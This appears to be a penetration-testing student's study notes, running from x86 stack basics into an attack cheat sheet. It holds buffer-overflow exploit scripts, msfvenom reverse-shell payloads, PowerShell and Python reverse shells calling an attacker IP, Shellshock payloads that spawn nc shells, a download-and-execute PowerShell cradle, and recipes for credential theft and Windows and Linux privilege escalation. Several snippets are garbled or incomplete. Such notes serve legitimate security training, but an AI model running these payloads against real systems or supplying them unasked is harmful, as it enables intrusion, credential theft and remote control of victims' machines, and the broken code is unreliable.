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Architecture Fundamentals ::

	CPU Instructions are represented in hexadecimal(HEX).
	The instructions are complex to read(machine code), thus they're getting translated into Assembly code(ASM) which is human-readable.

	Each CPU has it's own ISA - Instruction set architecture,
	ISA is what a programmer can see:
		Provides all the necessary info for who want to write a program in that machine lang.
		Examples are: Intel 8086 - x86, AMD64 - x64
	number of bits 32,64 refers to the width of the CPU registers.
	Each CPU has its fixed set of registers that are accessed when required.
	General Purpose Registers (GPRs):
		EAX - Accumulator   	  - Used in arithmetic operations
		ECX - Counter       	  - Used in shift/rotate instr. and loops
		EDX - Data          	  - Used in arithmetic operations & I/O
		EBX - Base          	  - Used as a pointer to data
		ESP - Stack Pointer 	  - Pointer to the top of the stack
		EBP - Base Pointer  	  - Pointer to the base of the stack
		ESI - Source Index        - Used as a pointer to a source in stream operation
		EDI - Destination         - Used as a pointer to a destination in stream operation
		EIP - Instruction Pointer - tells the CPU where the next instuction is
Process Memory:
		The text region, or instr. segment, is fixed by the program and a contains the program code(instructions). - read-only.
		The data region is divided into initialized data and uninitialized data.
		initialized data includes items such as static and global declared variables that are pre-defined and can be modified.
		uninitialized data, named 'Block Started by Symbol'(BSS), also initializes variables that are initialized to zero or do not have explicit initialization(C++ ex. : int t;)
		Starts right after BSS, during the execution the program can request more space in memory via brk and sbrk system calls, used by malloc(memory allocate) and realloc(re-allocate) and free. Hence, the size of the data region can be extended; this is not vital.
		The stack is a LIFO(Last in first out) block of memory. It is located in the higher part of the memory. Can be thought as an array used for saving a fucntion's return addresses, passing function arguments, and storing local variables.
			The purpose of the ESP register(Stack Pointer) is to identify the top of the stack,
			and it is modified each time a value is pushed in(PUSH) or popped out(POP).
			A PUSH instruction subtracts 4(32-bit) or 8(64-bit) from the ESP and writes the data to the memory address in the ESP, then updates the ESP to the top of the stack.
			Stack grows backwards, therefore the PUSH substracts 4 or 8, in order to point to a lower memory location on the stack. If we don't subtract it, the PUSH operation will overwrite the current location pointed by ESP(the top) and we'd lose data.
			Opposite of the PUSH instruction, it retrieves data from the top of the stack.
			Therefore, the data contained in the address location in ESP is retrieved and stored(usually in another register). After a POP operation, the ESP value is incremented, by 4 or by 8.
		Procedures and Fucntions:
			Stack Frames:
				Functions contain two important components, the prologue and the epilogue.
				The prologue prepares the stack to be used, similar to putting a bookmark in a book. when the function has completed, the epilogue resets the stack to the prologue settings.
				The stack consists of logical stack frames(portions/areas of the stack), that are PUSHed when calling a function and POPed when returning a value.
				When a subroutine, such as a function or procedure, is started, a stack frame is created and assigned to the current ESP location(top of stack); this allows the subroutine to operate independently in its own location in the stack.
				When a subroutine ends:
					1. The program recieves the parameters passed form the subroutine.
					2. The insturction Pointer(EIP) is reset to the location at the time of the initial call.
					The stack frame keeps track of the location where each subroutine should return the control when it terminates.
				when a functions is called, the arguments [(in brackets)] need to be evaluated.
				The control flow jumps to the body of the function, and the program executes its code.
				Once the function ends, a return statement is encountered, the program returns to the function call(the next statement in the code).
				When a new function is called, a new stack frame has to be created.
				the stack frame is defined by the EBP(Base Pointer) and the ESP(Stack Pointer)... the bottom and the top of the stack.
				For us to not lose the information of the old stack frame, which is the function that called the current function, we have to save the current EBP on the stack.
				If not done, we wouldn't know that this info belonged to a previous stack frame when returned.

					Example of a function call:
						1. push ebp
						2. mov ebp, esp
						3. sub esp, X(number)

						1. push ebp:
							The first instruction saves the old EBP onto the stack, so it could be restored later.
						2. mov ebp, esp:
							The second instuction copies ESP value to EBP.
						3. sub esp, x:
							The last instruction moves the ESP by decreasing it's value, necessary for making space for the local variables.

					Example of a function pop:
						1. mov esp, ebp
						2. pop ebp
						3. ret

						1. mov esp, ebp:
							The first instruction makes both the ESP and EBP point to the same location.
						2. pop ebp:
							The second instruction removes the value of EBP from the stack, sinch the top of the stack points to the old EBP, the stack frame is restored. (and ESP points to the old EIP previously stored)
						3. ret:
							The last instruction pops the value contained at the top of the stack to the old EIP - The next instruction after the call and jumps to that location.
							RET affects only the EIP and the ESP registers.

				The way of storing data in the memory.
				MSB - Most significant bit - in a binary number is the largest value, usually the first from the left.
					binary is - 100, MSB is 1.
				LSB - Least significant bit - in a binary number is the smallest value, usually the first from the right.
					binary is - 100, LSB is 0.

					In the big-endian representation, the LSB is stored at the highest memory address, while the MSB at the lowest.
					In the little-endian representation, the LSB is stored at the lowest memory address, while the MSB at the highest.

				NOP is an Assembly language instruction that does nothing(NOP=No operation instruction).
				When a program encounters a NOP, it skips to the next instruction. in x86 represented by HEX value of 0x90.

					NOP-sled is a technique used during exploitation process of buffer overflows. Its only purpose is to fill a large(or small) portion of the stack with NOPs; this will allow us to slide down to the instruction we want to execute, which is usually put after the NOP-sled.
					That's because BOF(buffer overflow) have to match a specific size and location that the program is expecting.

Security Implementations ::

	Address Space Layout Randomization(ASLR)
	The goal is to introduce randomness for executables, libraries, and stacks in the memory address space.
	Makes it difficult for an attacker to predict memory addresses and exploit.
	When ASLR is loaded the OS loads the same executable at different locations in memory every time.
	*ASLR is not enabled for all modules, means that there could be a DLL in the address space without the protection, making the whole prgoram vulnerable*

	Verify ASLR:
		-Process Explorer

		Enhanced Mitigation Experience Toolkit(EMET)

			Defensive hardware and software measure that prevents the execution of code from pages in memory that are not explicitly makred as executables.
			Code Injected into the memory can't be run from this region.

		The Canary(Stack Cookie):
			A security measure, places a value next to the return address in the stack.
			The function prologue loads a value into this location, while the epilogue makes sure that the value is intact.
			As a result, when the epilogue runs, it checks that the value is still there and that it is correct.

Assembly ::

	Assemble - nasm -f win32 file.asm -o output.obj
	Link DLLs - GoLink.exe /entry _main output.obj 1_dll.dll 2_dll.dll
		/entry _main - tells the linker the entry point for the program

ASM Basics:
		Data Transfer:
			MOV  - Moves data from one location to another on the memory
			XCHG - Exchange the data of two operands (but not between memory)
			PUSH - Pushes a value into the stack
			POP  - Deletes a value off the stack
			ADD  - Increment
			SUB  - Subtract
			MUL  - Multiply
			XOR  - Exclusive or (outputs true only if when input differ, one is true and other is false)
			NOT  - same as '!'
		Control Flow:
			CALL - CALL a function 
			RET  - Return, end function
			LOOP - 
			Jc   - (c - condition) jump if NE(not equal), E(equal), NZ(not zero), JGE(greater or equal), etc.
			STI  -
			CLI  -
			IN   -
			OUT  -

	Intel vs AT&T:
		Intel(Windows) - <instruction><destination><source>
		AT&T(Linux)    - <instruction><source><destination>
			puts % before registers and a $ before numbers.
			suffix to the instuction to define operand size as well:
				Q-quad(64bit), L-Long(32bit), W-Word(16bit), B-Byte(8bit)

	PUSH instruction:
		PUSH stores a value on the top of the stack, causing the stack to be adjusted by -4 bytes (on 32-bit), -0x04.
		PUSH under the hood just subtracts -4 from the ESP.

	POP instruction:
		POP reads the value from the top of the stack, causing the stack to be adjusted by +4 bytes, +0x04.
		Adds +4 to the ESP.

	CALL instruction:
		Subroutines are implemented by using the CALL and RET instruction pair.
		The CALL instruction pushes the current instruction pointer(EIP) to the stack and jumps to the function address specified.
		Whenever the function executes the RET instruction, the last element is popped from the stack, and the CPU jumps to the address.

Tools ::

gcc - gcc -m32(architecture) file.c -o(output) file.exe
objdump - objdump -d(disassemble) -Mintel(architecture) file.exe > assembly.txt

Buffer Overflows ::

	import sys
	import socket


	while len(buffer) <= 30:

	for string in buffer:
	    print("Fuzzing... with %s bytes" % len(string))
	    s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	    connect=s.connect(('', 9999))
	    s.send(('TRUN /.:/' + string))

	when the program crashes, we note the bytes in which it happened and move on to finding the offset.

Finding the offset:

	/usr/share/metasploit-framework/tools/exploits/pattern_create.rb -l (bytes)

	/usr/share/metasploit-framework/tools/exploits/pattern_offest.rb -l (bytes) -q (EIP)

	or with mona:

		!mona pc (pattern_create)

		!mona po (pattern_offset)r

	import sys
	import socket

	shellcode = <pattern_create>
	s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
		connect=s.connect(('IP', port))
		s.send(('TRUN' /.:/ + shellcode))
		print("CHECK DEBUGGER!.")

Overwriting the EIP:

	import sys
	import socket

	shellcode = "A"*2003 + "B"*4
	s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
		connect=s.connect(('IP', port))
		s.send(('TRUN' /.:/ + shellcode))
		print("CHECK DEBUGGER!.")

Finding bad characters:

	import socket
	import sys

	badchars = (

	shellcode = "A"*2003+"B"*4 + badchars
	s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)

		connect=s.connect(('IP', port))
		s.send(('TRUN /.:/ + shellcode'))
		print("CHECK DEBUGGER!.")

	Then follow ESP in dump.

Find the right module:

	!mona modules
		check for False ASLR+DEP dlls

		JMP ESP ? (FFE4)

	!mona find -s "\xff\xe4" -m dll.dll

	then from results:

		import socket
		import sys

		shellcode = "a"*2003 + "\x??\x??\x??\x??"
		s=scoket.socket(socket.AF_INET, socket.SOCK_STREAM)
			connect=s.connect(('IP', port))
			s.send(('TRUN /.:/ + shellcode'))
			print("CHECK DEBUGGER!.")

		see if .dll is loaded into EIP

Gaining remote shell:

	msfvenom -p windows/shell_reverse_tcp LHOST=lhost LPORT=4343 EXITFUNC=thread -f c -a x86 --platform windows -b "\x00"

	or for linux:

	msfvenom -p linux/x86/shell_reverse_tcp LHOST= LPORT=4444 EXITFUNC=thread -a x86 --platform linux -f c -b "\x00" -e x86/shikata_ga_nai

	add the payload, and some NOP's.
	a NOP is a hex of \x90, add it right after the overwritten EIP, "\x90"*32 should be enough.


BOF With Ruby on the go:

	pry --simple-prompt

	require "socket"
	s ="<IP>", <PORT>)
	s.gets - get banner
	s.puts "A"*<NUMBER>



Information Gathering ::


	goal is to retrieve:
		- Domains
		- Mail servers
		- Netblocks / IP Adresses
		- ISP's used
		- etc.

	Scope of engagement:

		SoE(Scope of engagement) is set by the customers needs:

			- Name of the organization - which is considered a full scope test
			- IP addresses / Netblocks to test

			Full Scope:

				DNS -> Dns enumeration techniques, whois
				IP  -> Reverse lookup, MSN Bing


				Live hosts -> Further DNS
				Further DNS

			*whois normally runs on port 43

	DNS Records:

		Resource Record -> TTL, Record class -> SDA, NS, A, PTR, CNAME, MX

		Resource Record - a resource record starts with a domain name usually a fully qualified domain name(FQDN, e.g.,

		TTL - Time-To-Live > recorded in seconds, defaults to the minimum value determinted in the SOA(Start of authority) record.

		Record Class - Internet, Hesoid, Chaos

		SOA - Start of Authority - Indicates the beginning of a zone and it should occur first in a zone file.
		There could only be one SOA record per zone.
		Defines certain values for the zone such as serial number and various expiration timeouts.

		NS - Name Server - defines an authoritative name server for a zone.
		Defines and delegates authority to a name server for a child zone.
		NS records are the glue that binds the distributed database together.

		A - Address - A record is a hostname to an IP address.
		Zones with A records are called "forward" zones.

		PTR - Pointer - the PTR record maps an IP address to a hostname.
		Zones with PTR records are called "reverse" zones.

		CNAME - the CNAME record maps an alias to an A record hostname

		MX - Mail Exchange - the MX record specifies a host that will accept mail on behalf of a given host.
		The host has an associated priority value, a single host may have multiple MX records.
		The records for a specified host make up a prioritized list.

		DNS Lookup:


			Reverse lookup -> nslookup -type=PTR <IP>

			MX lookup      -> nslookup -type=MX <IP>

			Zone Transfers:

				Are usually a misconfiguration of the remote DNS server, they should be enabled only for trusted IP addresses.
				When zone transfers are enabled, we can enumerate the entire DNS record for that zone.
				Includes all the sub-domains of our domain (A Records).

				How it works:

					Starting off with a NS lookup -> nslookup -type=NS


						server <NS Domain>
						ls -d

				In Linux:


					Reverse lookup -> dig <IP> PTR

					MX Lookup      -> dig <IP> MX

					NS Lookup      -> dig <IP> NS

					Zone Transfer:

						dig axfr

						dig +nocmd AXFR +noall +answer

						* dig @<DOMAIN IP> -t AXFR +nocookie

		    determine domain name:

		    	dig @<IP> -x <DOMAIN IP> +nocookie

			determine subdomains:

				Reverse lookup from NS server, or lookup in Google/Bing -> ip:<ip> (in search)


		Netblocks and AS:

			Netblocks are basically subnets.
			AS - autonomous system - is made of one or more netblocks under the same administrative control.
			Big corporations and ISP's have an autonomous system, while smaller companies will barely have a netblock.

			nmap -> --disable-arp-ping / --send-ip
			nmap -> -PS flag to TCP scan to not generate too much traffic = workaround for firewalls

			futher dns:

				DNS TCP SCAN - nmap -sS -p53 <netblock>

				DNS UDP SCAN - nmap -sU -p53 <netblock>

		fierce -dns
		fierce -dns -dnsserver
		dnsrecon -d


fping, hping, nmap:

	fping -e - time to send and recieve back the packer (IDS/IPS detection)

	hping3 -2 - send UDP packet
	hping3 -S - TCP/SYN - host discovery
	hping3 -p - SYN/ACK
	hping3 -F - FYN packet
	hping3 -U - urgent
	hping3 -X - XMAS package
	hping3 -Y - YMAS package
	hping3 -1 192.168.1.x --random-dest -I eth0 - check if subnet alive
	hping3 -S -r -p <port> <IP> - estimate good zombie host (if id increment by +1 = open, if by +2 = closed)

	nmap --ossscan-guess - OS Scan more aggressively (used with -O flag)
	nmap -sS --source-port(or -g) 53 -p 53 - source port
	nmap --spoof-mac (devie) - send from apple/win/lin etc. MAC Address
	nmap --spoof-mac 0 - spoof random MAC Address
	nmap --spoof-mac <MAC Address> - spoof specific MAC Address
	nmap --randomize-hosts - random hosts scan order

	netdiscover -i tap0(eth/wlan...) -S -L -f -r <ip>/<subnet>
	arp-scan -I tap0(eth/wlan...) <ip>/<subnet>

	dnsenum -
	dnsenum --subfile file.txt -v -f /usr/share/dnsenum/.txt -u a -r - store subdomains in file.txt

Enumeration ::


	UDP 137 - name services
	UDP 138 - datagram services
	TCP 139 - session services

	name services:

		00 - Workstation Service - Messenger Service
		03 - Messenger Service - Master Browser
		06 - RAS Server Service - Domain Master Browser
		1F - NetDDE Service - Domain Name
		20 - Server Service - Domain Control
		21 - RAS Client Service - Browser Service Elections
		BE - Network Monitor Agent - Master Browser
		BF - Network Monitor Application

	nbtstat -A <target IP> - information gathering (Windows)
	nmblookup -A <target IP> - information gathering (Linux)
	nbtscan -v <target IP> - information gathering (Linux)
	nbtscan -v <IP>/subnet - scan entire subnet
	smbmap -H - enumerate shares and permissions
	net view <IP> - list domains, computers, resources shared by a computer on the network
	net use <Drive Letter>: \\<IP>\C(or C$,IPC... etc.)
	smbclient -L <IP> - smb connect
	smbclient -N \\\\<IP>\\<share> -U "" - SMB login to anonymous access
	mount.cifs //<IP>/C /media/<Folder> user=,=pass= - navigate target shares
	mount -t nfs <IP>:/home/<user> /mnt/<IP>_nfs -o nolock (first do mkdir /mnt/<IP>_nfs)
	net use \\<IP>\IPC$ "" /u:"" - Null Session
	winfo <IP> -n - flag -n means to try to establish a null session before gathering information
	DumpSec - Report>Select Computer >> \\<IP>
	enum4linux <IP> - enumerate linux machine remotely
	enum4linux -r <IP> - enumerate users
	rpcclient -N -U "" <IP> - if establishes then "help"
	rpcclient > 'enum' for us ul commands

	msf> use auxiliary/scanner/smb/smb_login

	nmap --script=smb-enum-users -p 445 <IP> --script-args=smbuser=<username>,smbpass=<password>

	msf> impersonate token:
		use incognito
		list_tokens -u
		impersonate_token <domain>\\<username>


	UDP 161 - General Messages
	UDP 162 - Trap Messages


		snmpwalk -v 2c <ip> -c public - v means version(2c) c means community string to use(public)
		snmp-mibs-downloader >> comment fourth line of /etc/snmp/snmp.conf (IF RETURNS OID NUMERICALLY)


		snmpset -v 2c <ip> -c public (OID) s(for STRING)


		1. find 139/445 open
		2. scan for 161 - nmap -sU -p 161 <ip>

	Finding communities:

		onesixtyone - onesixtyone -c /usr/share/doc/onesixtyone/dict.txt <ip>
		nmap -vv -sV -sU -Pn -p 161,162 --script=snmp-netstat,snmp-processes <ip>
		nmap -vv -sV -sU -Pn -p 161,162 --script=snmp-* <ip>  (FIND ALL)

Scan network from within a host:
	run autoroute -s <IP>(.0)/Subnet
	use <IP>canner/portscan/tcp(or udp)

Hydra brute SMB:
	hydra -L users.txt -P /usr/share/john/password.lst <IP> smb -f -V

Sniffing & MITM ::

Passive sniffing - listening to packets on the network in order to gather sensitive information, using Wireshark for instance.

Active sniffing - actively performing malicious operations such as MAC Spoofing and ARP Poisoning on the network in order to redirect the traffic.
downside is that it is not a stealthy technique.

MAC Spoofing - meant to stress the switch and feel the CAM table. the CAM table keeps all the info required to forward frames to the correct port.
<MAC - port - TTL>
when the space is filled with fake MAC addresses, the switch can't learn new MACs. then the only way to keep the network alive is to forward the
frames meant to be delivered to the unknown MAC address on all of the ports on the switch, thus making it fail open, or act like a hub.

ARP Poisoning - probably the stealthiest of the active sniffing techniques. does not bring down switch functionality, instead it exploits
the concept of traffic redirection. one of the most used attacks to perform a MITM attack.
By exploiting the network via ARP poisoning, the attacker is able to redirect the traffic of the selected victim to a specific machine.
Doing this enables the attacker to not only monitor, but also modify the traffic.
can also be used to DoS the target. 


	Address resolution protocol. Matches IP addresses(Layer 3) with MACs(Layer 2).

	ARP Tables:
		when HOST A creates a packet destined to HOST B, before it's delivered HOST A searches it's ARP table... if HOST B is found in the table
		the correspondent MAC address is inserted as the Layer 2 destination address into the protocol frame.
		If the entry isn't found in the ARP table, an ARP request is sent on the LAN. the request contains the following values in the desination
		fields of the IP-Ethernet packets:
		Source IP: IP_A
		Source MAC: MAC_A
		Destination IP: IP_B
		Destination MAC: FF:FF:FF:FF:FF:FF
			* the F's indicates a broadcast message
		the nodes which IP address do not match with the destination IP_B will drop the packet.
		the node which matches will respond with an ARP reply to the sender, with the MAC.
		then it is inserted into the ARP table for future use.

Tools :


		active/passive sniffing, MITM attacks, monitoring the network for data such as passwords, emails, files etc.


			Passive - filesnarf, mailsnarf, msgsnarf, urlsnarf, webspy
			Active - arpspoof, dnsspoof, macof
			MITM - sshmitm, webmitm

	TCPdump(-or- windump for windows):

		tcpdump -i eth0(wlan0,tap0...)
		needs creds decoding from base64 - echo <base64> | base64 -d

		tcpdump -D - shows available interfaces for sniffing
		tcpdump -i eth0(wlan0,tap0...) - sniff traffic on interface
		tcpdump -v - verbose mode
		tcpdump -q - quiet option
		tcpdump -i eth0 host - show only traffic between host and website
		tcpdump -i eth0 src <IP> dst <IP> - show only traffic between source IP and destination IP
		tcpdump -F - import to file
		tcpdump -c <num of packets> - stop capturing after a certain amount of packets captured

LLMNR/NBT-NS Poisoning:

	1. HOST A requests an SMB share, but has a typo in the SMB address he's trying to access
	2. since it can't be resolved by the DNS, HOST A falls back to LLMNR/NBT-NS broadcast msg asking the LAN for the ip address of the typo share
	3. HOST B responds to this message claiming to be the typo share system
	4. HOST A complies and sends HOST B their username and NTLMv1/v2 hash


		SMB-Signing check - -i <target>

		modify responder.conf - SMB=OFF, HTTP=OFF

		responder -I eth0(wlan0,tap0...) --lm
		+ -t <target> -u ALL

setup port redirection -> iptables -t nat -A PREROUTING -p tcp  --destination-port 80 -j REDIRECT --to-ports 8080

sslstrip -a -f -l 8080 -w ssl_usr

bettercap -G <TARGET_IP> -T <VICTIM_IP> --proxy-https

python -i eth0 --spoof -arp --dns --hsts --gateway <GATEWAY_IP> --targets <TARGET_IP>

see which port is enabled - netstat -an |findstr :<port>
see firewall rules - netsh firewall show config
enable RDP - reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
open RDP on FW - netsh firewall add portopening TCP 3389 "Remote Desktop"

Unquoted Paths: 
	wmic service get name,pathname,displayname,startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """

	if found, go through directories and list permissions with icacls on each dir.
	Insert payload(and set to windows/shell_reverse_tcp) and BAM.

	# sc qc "vulnsvc" -> Query service config
	# try sc stop/start
	# shutdown /r /t 0 -> Restart endpoint to restart services aggressively

	# sc config <service name> binpath="C:\.........\<payload>.exe"

DNS Tunneling:

	iodine -P '<PASS>' -T CNAME -r -f 

	To SSH Socks proxy:

		ssh <user>@<nameserver IP> -D<LHOST-DNS CONNECTION>:<PORT> -N -C

DLL Hikjacking:

	procexp to find process run by NT AUTHORITY\SYSTEM
	procmon to find dlls run by the process found in last step
	-> check if there's a "NAME NOT FOUND" .dll file -> make a fake dll with the same name that contains a payload.

Pivoting ::

Pivoting Playbook:

	If the victim's machine has got 2 NICs ->
		Use meterpreter's autoroute post module
		Then ARP scan to find hosts
		Then exploit a machine on the other network
		using socks4 to set a proxy & proxychains to use it
	If the new machine has got 2 NICs ->
		Autoroute again on the last pivot
		Then exploit the new victim
		using socks4 to set a new proxy & proxychains to use it

use post/windows/manage/autoroute

to proxy through the pivot, exploit again with pivot IP.

Pass the hash:

	meterpreter > hashdump
	set SMBUser
	set SMBPass <hash>

Info Gathering:

	use sniffer
	sniffer_start <interface number>
	sniffer_dump <interface number> <filename.pcap>
	sinffer_stop <interface number>
	use post/multi/recon/local_exploit_suggester

sshuttle -r root@<IP> --ssh-cmd "ssh -i ird_rsa" <remote subnet> -x <IP>


	powershell.exe -nop -ep bypass -C iex (New-Object Net.Webclient).DownloadString('http://<SimpleHTTPServer>/SessionGopher.ps1'); Invoke-SessionGopher 

	-Thorough - more info

Active Directory:

	load extapi
	adsi_computer_enum <USERDNSDOMAIN> - enumerate AD computers
	adsi_user_enum <USERDNSDOMAIN> - enumerate AD users

Creds stealing:

	AD policies - %USERDNSDOMAIN%\Policies
	Sysvol share - %LOGONSERVE%\Sysvol

	Than you can find user creation policies by searching for groups.xml files in the policies directory.
	System administrators usually use AD policies to deploy a local administrator account in a domain environment.

	find groups.xml in {...}\Machine\Preferences\Groups\Groups.xml
	then decrypt the password with gpp-decrypt.

	then you can run execute a reverse shell by using post/windows/manage/run_as

	then if getsystem fails use -> exploit/windows/local/bypassuac_injection

	load mimikatz
	kerberos - try to harvest users and passwords
	wdigest - try harde


		evil-winrm -u <user> -H <hash> -i <IP> (or -p for password instead of hash) -s <include scripts path>

		include Empire scripts from - /opt/Empire/data/module_source/<path>/<to>/<script>

	port forward for RDP:

		portfwd add -L -l 3389 -r <remote machine> -p 3389
		rdesktop -u <domain>\<user> -p "<password>"

		portfwd add -L <LHOST> -l <LPORT> -p <PORT TO FORWARD>(80,3389,etc.) -r <RHOST>

	file share with RDP:

		xfreerdp /v:IP /u:USERNAME /p:PASSWORD +clipboard /dynamic-resolution /drive:/usr/share/windows-resources,share

	socks4a & proxychains:

		use auxiliary/server/socks4a
		set SRVHOST as LHOST, and SRVPORT as the port of the pivot.

		set proxychains to connect through the newly made socks4 proxy.
		run commands freely(modify /etc/proxychains.conf).


		chisel server -p <SRVPORT> --socks5
		chisel client <RHOST>:<SRVPORT> <PROXY_PORT>:socks

		netsh advfirewall firewall add rule name="NAME" dir=in action=allow protocol=tcp localport=<PORT>


powershell rev shell:

	powershell.exe -c "$client = New-Object System.Net.Sockets.TCPClient('<LHOST>',<PORT>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

python rev shell:

	python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<ATTACKER_IP>",<ATTACKER_PORT>));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);["/bin/sh","-i"]);'

shellschock test:

	env x=`() { :;}; echo vulnerable' bash -c "echo test"

	nmap --script http-shellshock --script-args uri=/cgi-bin/login.cgi <IP> -p 80

	wget -U "() { foo;};echo \"Content-type: text/plain\"; echo; echo; /bin/cat/etc/passwd http://<IP>/cgi-bin/login.cgi && cat login.cgi

	wget -U "() { foo;};echo; /bin/nc <IP> <PORT> -e /bin/sh" http://<IP>/cgi-bin/login.cgi

heartbleed test:

	nmap --script ssl-heartbleed <IP>

	if vulnerable:

		msfconsole -> auxiliary/scanner/ssl/openssl_heartbleed
		show actions (DUMP)
		leak file stored in .msf(versionNumber)/loot as a .bin file

Crack zip:

	fcrackzip -v -D -u -p /usr/share/wordlists/rockyou.txt <ZIP-FILE>

Windows Priv Esc::

Insecure service permissions:

	accesschk.exe /accepteula -uwcqv <user> <service>
	sc qc <service>
	sc config <service> binpath= "\"C:\Path\To\revshell.exe\""
	net start <service>

Unquoted path:

	sc qc <service>
	accesschk.exe /accepteula -uwdq "C:\Program Files\Unquoted Path Service\"
	copy shell.exe "C:\Program Files\Unquoted Path Service\Common.exe" (Common Files folder)
	net start <service>

Weak registry permissions:

	sc qc <service>
	accesschk.exe /accepteula -uvwqk HKLM\System\CurrentControlSet\Services\<service>
	reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d C:\PrivEsc\reverse.exe /f

Always install elevated:

	reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
	reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
	msiexec /quiet /qn /i C:\PrivEsc\reverse.msi

SAM Files:

	copy C:\WINDOWS\Repair\SAM \\<IP>\<SHARE>
	hashcat -m 1000 --force <hash> /usr/share/wordlists

Scheduled Task:

	accesschk.exe /accepteula -quvw user C:\DevTools\CleanUp.ps1
	echo C:\PrivEsc\reverse.exe >> C:\DevTools\CleanUp.ps1

Bypass upload access denied:
		powershell.exe -c "iwr -OutFile C:\temp\nc.exe"

	runas /env /profile /user:<DOMAIN/PC>\Administrator "C:\temp\nc.exe -e cmd.exe 

cd /tmp echo "/bin/sh" > curl chmod 777 curl echo $PATH export PATH=/tmp:$PATH /opt/statuscheck id cd /root cat proof.txt

Linux Privilege Escalation::

MYSQL root user - UDF:
	gcc -g -c raptor_udf2.c -fPIC
	gcc -g -shared -Wl,-soname, -o raptor_udf2.o -lc
	mysql -u root
	use mysql;
	create table foo(line blob);
	insert into foo values(load_file('/home/user/tools/mysql-udf/'));
	select * from foo into dumpfile '/usr/lib/mysql/plugin/';
	create function do_system returns integer soname '';
	select do_system('cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash');
	/tmp/rootbash -p

Writeable /etc/passwd:

	openssl passwd newpasswordhere
	root:x:.......  -> change x to pass
	OR - copy the line and change the root username and then su to the new root
	su c0ffee0vrflw

Cron Jobs - File Permissions:

	cat /etc/crontab
	ls -l /usr/local/bin/
	change to:
		bash -i >& /dev/tcp/ 0>&1

Cron Jobs - Wildcards:

	msfvenom -p linux/x64/shell_reverse_tcp LHOST= LPORT=4444 -f elf -o shell.elf
	chmod +x /home/user/shell.elf
	touch /home/user/--checkpoint=1
	touch /home/user/--checkpoint-action=exec=shell.elf

SUID / SGID Executables - Known Exploits:

	find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null

 Passwords & Keys - History Files:

 	cat ~/.*history | less


PTP study notes






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